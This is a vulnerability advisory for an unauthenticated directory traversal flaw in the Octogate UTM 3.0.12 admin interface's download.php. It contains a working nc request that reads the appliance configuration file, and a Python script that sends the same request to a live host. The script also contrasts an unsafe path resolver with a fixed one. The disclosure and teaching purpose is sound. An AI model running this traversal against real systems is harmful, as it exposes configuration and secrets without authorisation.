# Exploit Title: Octogate UTM Admin Interface Directory Traversal
# Date: 26.08.2015
# Software Link: http://www.octogate.com
# Exploit Author: Oliver Karow
# Contact: oliver.karow@gmx.de
# Website: http://www.oliverkarow.de
# Category: Remote Exploit
Affected Products/Versions
--------------------------
Product Name: Octogate
Version: 3.0.12 - Virtual Appliance & Appliance
Product/Company Information
---------------------------
Octogate is a UTM device, including the following features: Application
Firewall, Intrusion Detection and Prevention, Stateful and Deep Packet
Inspection, DoS and DDoS protection, and Reverse Proxy.
Octogate IT Security Systems GmbH is based in Germany.
Vulnerability Description
-------------------------
The Octogate UTM device is managed via a web interface. The download
function for the SSL certificate and the documentation is accessible
without authentication, and the script that implements it,
/scripts/download.php, does not restrict the file parameter to the
intended download directory. An unauthenticated attacker can therefore
use "../" sequences in the file parameter to read files outside the web
root, including the appliance configuration.
Example request (reads the appliance configuration file octogate.ini from
outside the web root; 192.168.0.177 is the management interface):

echo -en "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer: http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80
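The following Python script is an added example and is not part of the advisory or of Octogate's code. It builds the same unauthenticated traversal request shown above, splits the raw HTTP response so the retrieved file can be inspected, and, to show what the patched download script has to do, places an unsafe path concatenation next to a resolver that confines the requested file to the download directory. The host, port, download root and the helper names are assumptions for illustration; only build_request reproduces what the advisory shows.

```python
"""Added example (not Octogate's code): the traversal request from the
advisory, plus the path check the download script lacks. Host, port,
download root and function names are assumptions for illustration."""
import os
import socket
from typing import Optional, Tuple
from urllib.parse import quote

# Script named in the advisory; everything else here is assumed.
DOWNLOAD_SCRIPT = "/scripts/download.php"
# Traversal prefix used in the advisory's example request.
TRAVERSAL_PREFIX = "/../../../../../../"


def build_request(host: str, target: str, dl_type: str = "dl") -> bytes:
    """Raw HTTP/1.0 request in the shape of the advisory's example.

    target is an absolute path on the appliance (e.g. /octo/etc/ini.d/octogate.ini);
    the vulnerable script concatenates the file parameter onto its download
    directory, so the leading "../" sequences walk up to the filesystem root."""
    file_param = TRAVERSAL_PREFIX + target.lstrip("/")
    path = f"{DOWNLOAD_SCRIPT}?file={quote(file_param, safe='/')}&type={dl_type}"
    lines = [
        f"GET {path} HTTP/1.0",
        f"Host: {host}",
        f"Referer: http://{host}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_response(raw: bytes) -> Tuple[int, bytes]:
    """Return (status code, body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    status = int(status_line.split()[1])
    return status, body


def fetch(host: str, port: int, target: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Send the traversal request to a live host (network use; not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, target))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


# --- The missing check: a hypothetical download handler, vulnerable and fixed.

def vulnerable_resolve(download_root: str, requested: str) -> str:
    """Plain concatenation: ".." in the request escapes download_root."""
    return os.path.normpath(download_root + "/" + requested)


def safe_resolve(download_root: str, requested: str) -> Optional[str]:
    """Canonicalise the path and refuse anything outside download_root.

    realpath also follows symlinks, so a link planted inside the root
    that points outside it is rejected too. Returns None on rejection."""
    root = os.path.realpath(download_root)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed target from the advisory; the host/port are assumptions.
    status, body = fetch("192.168.0.177", 80, "/octo/etc/ini.d/octogate.ini")
    print(status)
    print(body.decode(errors="replace"))
```

safe_resolve is the shape of the fix a reviewer would look for in download.php: resolve the final path, then compare it with the allowed directory, instead of filtering "../" strings out of the parameter, which misses encoded and mixed forms. Run the script directly to send the request against a lab instance; the resolver functions run offline.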
Patch Information
-----------------
A patch is available from the vendor.
Advisory Information
--------------------
http://www.oliverkarow.de/research/octogate.txt